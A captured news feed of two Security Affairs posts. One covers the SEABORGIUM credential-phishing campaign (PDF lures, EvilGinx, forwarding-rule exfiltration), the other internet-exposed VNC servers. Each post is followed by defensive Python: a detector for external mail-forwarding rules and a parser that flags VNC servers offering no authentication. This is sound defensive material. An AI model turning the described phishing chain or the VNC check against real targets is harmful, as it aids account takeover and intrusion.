[l] at 8/15/22 3:46pm
Microsoft disrupted a hacking operation conducted by the Russia-linked APT SEABORGIUM aimed at NATO countries.

The Microsoft Threat Intelligence Center (MSTIC) has disrupted activity by SEABORGIUM (aka ColdRiver, TA446), a Russia-linked threat actor behind a persistent hacking campaign targeting people and organizations in NATO countries.

“Microsoft has disrupted activity by SEABORGIUM, a Russia-based actor launching persistent phishing, credential and data theft, intrusions, and hack-and-leak campaigns tied to espionage. More details + TTPs in this MSTIC blog: https://t.co/nVoF8GxrFQ” — Microsoft Security Intelligence (@MsftSecIntel) August 15, 2022

SEABORGIUM has been active since at least 2017; its campaigns involve persistent phishing and credential theft leading to intrusions and data theft. The APT primarily targets NATO countries, but experts also observed campaigns targeting the Baltics, Nordics, and Eastern Europe regions, including Ukraine.

The SEABORGIUM group primarily focuses operations on defense and intelligence consulting companies, non-governmental organizations (NGOs) and intergovernmental organizations (IGOs), think tanks, and higher education. The group also targets former intelligence officials, experts in Russian affairs, and Russian citizens abroad.

SEABORGIUM’s campaigns begin with reconnaissance of target individuals, with a focus on identifying their contacts on social networks or their sphere of influence.

“Based on some of the impersonation and targeting observed, we suspect that the threat actor uses social media platforms, personal directories, and general open-source intelligence (OSINT) to supplement their reconnaissance efforts.” reads the post published by Microsoft.

MSTIC, in partnership with LinkedIn, has observed fraudulent profiles attributed to SEABORGIUM being used sporadically for conducting reconnaissance of employees from specific organizations of interest.

Threat actors used fake identities to contact target individuals and start a conversation with them to build a relationship and trick them into opening an attachment sent via phishing messages. The phishing messages used PDF attachments and, in some cases, included links to file or document hosting services or to OneDrive accounts hosting the PDF documents.

Upon opening the PDF file, it displays a message stating that the document could not be viewed and that the user should click on a button to try again. Clicking the button redirects the victim to a landing page running a phishing framework, such as EvilGinx, that displays the sign-in page for a legitimate provider and intercepts any credentials. After the credentials are captured, the victim is redirected to a website or document to avoid raising suspicion.

Once the attackers have gained access to the targeted email account, they exfiltrate intelligence data (emails and attachments) or set up forwarding rules from victim inboxes to actor-controlled dead drop accounts. In several cases, SEABORGIUM has been observed using their impersonation accounts to facilitate dialog with specific people of interest.

Microsoft confirmed it has taken action to disrupt SEABORGIUM’s operations by disabling accounts used for surveillance, phishing, and email collection. The IT giant also shared indicators of compromise (IOCs) for this threat actor, including a list of more than sixty domains used by the APT in its phishing campaigns. The complete list of domains can be found in Microsoft’s advisory, along with safeguards that network defenders can use to prevent similar attacks. Defenses include disabling email auto-forwarding in Microsoft 365, using the IOCs to investigate for potential compromise, requiring MFA on all accounts, and, for more security, requiring FIDO security keys. Microsoft has also released Azure Sentinel hunting queries [1, 2] that can be used to check for malicious activity.
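Microsoft's advisory lists disabling auto-forwarding and hunting for forwarding rules among the defenses against this actor. As an added example (not code from Microsoft, Security Affairs, or the linked Sentinel queries), the Python below flags mailbox-rule changes that forward mail outside the organisation, which is the dead-drop pattern described above. The records are constructed for the example and shaped like Microsoft 365 unified audit log entries for Exchange cmdlets (an Operation name plus a Parameters list of Name/Value pairs); that shape, the tenant domain example.org and every address in the sample are assumptions, so map the field names to your own export if they differ.

```python
"""Flag mailbox rules that forward mail outside the organisation.

Added example, not code from Microsoft's advisory. The records are
constructed to resemble Microsoft 365 unified audit log entries for Exchange
cmdlets (an Operation plus a Parameters list of Name/Value pairs); the field
names and the tenant domain are assumptions for this example.
"""
import json
import re

# Assumed: the organisation's own mail domains. Anything else counts as external.
INTERNAL_DOMAINS = {"example.org"}

# Cmdlets and parameters that can set a forwarding destination, either as an
# inbox rule (set by the user) or as mailbox-level forwarding (set by an admin).
FORWARDING_PARAMS = {
    "New-InboxRule": {"ForwardTo", "ForwardAsAttachmentTo", "RedirectTo"},
    "Set-InboxRule": {"ForwardTo", "ForwardAsAttachmentTo", "RedirectTo"},
    "Set-Mailbox": {"ForwardingSmtpAddress", "ForwardingAddress"},
}

# Pulls the SMTP address out of values such as "[SMTP:user@host]" or "smtp:user@host".
ADDR_RE = re.compile(r"[\w.+-]+@[\w.-]+\.\w+")

# Constructed sample export: four audit records, two of them benign.
CONSTRUCTED_LOG = json.loads(r"""
[
  {"CreationTime": "2022-08-10T07:12:43", "Operation": "New-InboxRule",
   "UserId": "alice@example.org",
   "Parameters": [{"Name": "Name", "Value": "sync"},
                  {"Name": "ForwardTo", "Value": "[SMTP:archive.sync@mail-drop.example.net]"},
                  {"Name": "DeleteMessage", "Value": "True"}]},
  {"CreationTime": "2022-08-10T08:01:10", "Operation": "New-InboxRule",
   "UserId": "bob@example.org",
   "Parameters": [{"Name": "Name", "Value": "to-deputy"},
                  {"Name": "ForwardTo", "Value": "[SMTP:carol@example.org]"}]},
  {"CreationTime": "2022-08-11T22:40:05", "Operation": "Set-Mailbox",
   "UserId": "admin@example.org",
   "Parameters": [{"Name": "Identity", "Value": "dave@example.org"},
                  {"Name": "ForwardingSmtpAddress", "Value": "smtp:d.private@webmail.example.net"},
                  {"Name": "DeliverToMailboxAndForward", "Value": "False"}]},
  {"CreationTime": "2022-08-12T09:15:30", "Operation": "Set-InboxRule",
   "UserId": "erin@example.org",
   "Parameters": [{"Name": "Identity", "Value": "newsletters"},
                  {"Name": "MoveToFolder", "Value": "Archive"}]}
]
""")


def external_addresses(value, internal_domains):
    """Return the addresses in a parameter value whose domain is not ours."""
    return sorted(
        addr.lower()
        for addr in ADDR_RE.findall(value)
        if addr.rsplit("@", 1)[1].lower() not in internal_domains
    )


def find_external_forwarding(records, internal_domains=INTERNAL_DOMAINS):
    """Return one finding per record that sets an external forwarding target.

    A rule that deletes the original (DeleteMessage) or mailbox forwarding
    without DeliverToMailboxAndForward hides the diversion from the owner, so
    each finding records whether the victim keeps a copy.
    """
    findings = []
    for rec in records:
        params = {p["Name"]: str(p["Value"]) for p in rec.get("Parameters", [])}
        watched = FORWARDING_PARAMS.get(rec.get("Operation"), set())
        targets = []
        for name in sorted(watched.intersection(params)):
            targets.extend(external_addresses(params[name], internal_domains))
        if not targets:
            continue
        no_copy = (params.get("DeleteMessage", "").lower() == "true"
                   or params.get("DeliverToMailboxAndForward", "").lower() == "false")
        # Set-Mailbox names the affected mailbox in Identity; inbox rules act on the caller's own.
        mailbox = params.get("Identity", rec["UserId"]) if rec["Operation"] == "Set-Mailbox" else rec["UserId"]
        findings.append({
            "time": rec["CreationTime"],
            "actor": rec["UserId"],
            "mailbox": mailbox,
            "operation": rec["Operation"],
            "destinations": sorted(set(targets)),
            "victim_keeps_copy": not no_copy,
        })
    return findings


if __name__ == "__main__":
    for f in find_external_forwarding(CONSTRUCTED_LOG):
        note = "" if f["victim_keeps_copy"] else "  (no copy kept)"
        print(f"{f['time']} {f['operation']:14} {f['mailbox']} -> {', '.join(f['destinations'])}{note}")
```

Run against the constructed log it reports Alice's rule and Dave's mailbox forwarding, both with no copy kept, and ignores Bob's internal forward and Erin's folder rule. The same check is useful as a baseline after the auto-forwarding block is in place: a tenant-level block stops delivery, but the rule creation still shows up in the audit log and is the earliest signal that an account was taken over.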
Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini (SecurityAffairs – hacking, NATO)

The post Microsoft disrupts SEABORGIUM’s ongoing phishing operations appeared first on Security Affairs.

[Category: APT, Breaking News, Cyber warfare, Hacking, Intelligence, Cyberespionage, hacking news, information security news, IT Information Security, NATO, Pierluigi Paganini, Russia, seaborgiums, Security News]

[l] at 8/15/22 12:01pm
Researchers from threat intelligence firm Cyble reported a surge in attacks targeting Virtual Network Computing (VNC).

Virtual Network Computing (VNC) is a graphical desktop-sharing system that leverages the Remote Frame Buffer (RFB) protocol to control another machine remotely. It transmits keyboard and mouse input from one computer to another and relays the graphical screen updates back over the network.

Researchers from Cyble looked for VNC exposed over the internet and discovered over 8,000 VNC instances with authentication disabled, most of them in China, Sweden, and the United States. Cyble observed a surge in attacks on the default port for VNC, port 5900, most of them originating from the Netherlands, Russia, and Ukraine.

Exposing VNC to the internet increases the likelihood of a cyberattack. Threat actors could use the access through VNC to carry out a broad range of malicious activities, such as deploying ransomware or malware, or spying on the victims.

The researchers discovered multiple Human Machine Interface (HMI) systems, Supervisory Control And Data Acquisition (SCADA) systems, workstations, etc., connected via VNC and exposed over the internet. Cyble also reported that threat actors are selling access to systems exposed on the internet via VNC on cybercrime forums.

“Our investigation found that selling, buying, and distributing exposed assets connected via VNCs are frequently on cybercrime forums and markets. A few examples of the same can be seen in the figures below.” Cyble states.

The experts pointed out that even if the count of exposed VNCs is low compared to previous years, some of the exposed VNCs belong to organizations in the critical infrastructure sector, such as water treatment plants, manufacturing plants, research facilities, etc.

“Remotely accessing the IT/OT infrastructure assets is pretty handy and has been widely adopted due to the COVID-19 Pandemic and work-from-home policies. However, if organizations do not have the appropriate safety measures and security checks in place, this situation can lead to severe monetary loss for an organization. Leaving VNCs exposed over the internet without any authentication makes it fairly easy for intruders to penetrate the victim’s network and create havoc.” Cyble concludes. “Attackers might also try to exploit the VNC service by using various vulnerabilities and techniques, allowing them to connect with the exposed asset(s).”

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini (SecurityAffairs – hacking, VNC)

The post VNC instances exposed to Internet pose critical infrastructures at risk appeared first on Security Affairs.
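Cyble's count in the article above is of VNC servers that accept clients with authentication disabled, which in RFB terms means the server offers security type 1 ("None"). As an added example (not Cyble's tooling or anything from its report), the Python below classifies a VNC server's security handshake as specified in RFC 6143: whether "None" is offered, whether an encrypting option such as TLS or VeNCrypt is available, and how an RFB 3.3 server (which picks one type itself) differs from 3.7/3.8 (which lists the types and lets the client choose). It operates on bytes captured from a connection to a server you administer; the four byte strings in SAMPLES are constructed so the module runs offline.

```python
"""Classify a VNC server's RFB security handshake (RFC 6143).

Added example, not Cyble's tooling. It works on bytes captured from a
connection to a server you administer; the byte strings below are constructed
samples so the module runs offline.
"""
import re
import struct

# Security type identifiers from RFC 6143 section 7.1.2 and the IANA RFB registry.
SECURITY_TYPES = {
    0: "Invalid",
    1: "None",                # no authentication at all: the exposure Cyble counted
    2: "VNC Authentication",  # challenge/response on a shared password, no encryption
    16: "Tight",
    18: "TLS",
    19: "VeNCrypt",
}
ENCRYPTING_TYPES = {18, 19}

# ProtocolVersion message: exactly "RFB xxx.yyy\n", 12 bytes.
VERSION_RE = re.compile(rb"^RFB (\d{3})\.(\d{3})\n$")


def parse_version(greeting):
    """Parse the 12-byte ProtocolVersion message, e.g. b'RFB 003.008\\n'."""
    m = VERSION_RE.match(greeting)
    if not m:
        raise ValueError(f"not an RFB greeting: {greeting!r}")
    return int(m.group(1)), int(m.group(2))


def parse_security_types(version, payload):
    """Return the list of security types the server offers.

    RFB 3.3: the server picks one type itself and sends it as a big-endian U32.
    RFB 3.7 and 3.8: a U8 count, then that many U8 type identifiers; a count of
    0 means the server refused the connection and a U32-length reason follows.
    """
    if version < (3, 7):
        (chosen,) = struct.unpack(">I", payload[:4])
        return [chosen]
    count = payload[0]
    if count == 0:
        (reason_len,) = struct.unpack(">I", payload[1:5])
        reason = payload[5:5 + reason_len].decode("latin-1", "replace")
        raise ConnectionError(f"server refused the connection: {reason}")
    types = list(payload[1:1 + count])
    if len(types) != count:
        raise ValueError("truncated security-types message")
    return types


def assess(greeting, security_msg):
    """Summarise what the server will accept from a connecting client."""
    version = parse_version(greeting)
    types = parse_security_types(version, security_msg)
    return {
        "version": f"{version[0]}.{version[1]}",
        "offered": [SECURITY_TYPES.get(t, f"unknown({t})") for t in types],
        # The client chooses among the offered types, so offering None is as
        # exposed as requiring it: any client may simply pick it.
        "auth_disabled": 1 in types,
        "encrypted_option": any(t in ENCRYPTING_TYPES for t in types),
    }


# Constructed captures of the first two server messages from four servers.
SAMPLES = {
    "open_3.8":     (b"RFB 003.008\n", b"\x02\x01\x02"),              # offers None and VNC auth
    "hardened_3.8": (b"RFB 003.008\n", b"\x01\x13"),                  # VeNCrypt only
    "open_3.3":     (b"RFB 003.003\n", b"\x00\x00\x00\x01"),          # 3.3 server chose None
    "refusing_3.8": (b"RFB 003.008\n", b"\x00" + struct.pack(">I", 8) + b"Too many"),
}

if __name__ == "__main__":
    for label, (greeting, msg) in SAMPLES.items():
        try:
            print(label, assess(greeting, msg))
        except ConnectionError as exc:
            print(label, exc)
```

The useful distinction for an inventory review is the "auth_disabled" flag rather than the absence of a password: a server that lists both "None" and "VNC Authentication" still lets any client choose "None", and even "VNC Authentication" alone leaves the session unencrypted, so for assets such as the HMI and SCADA systems Cyble describes the expected result is a handshake offering only an encrypting type, reached through a VPN or bastion rather than directly from port 5900 on the internet.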

[Category: Breaking News, Hacking, ICS-SCADA, Security, critical infrastructure, hacking news, information security news, IT Information Security, Pierluigi Paganini, Security Affairs, Security News, VNC]

As of 8/19/22 1:52pm. Last new 8/19/22 10:41am.
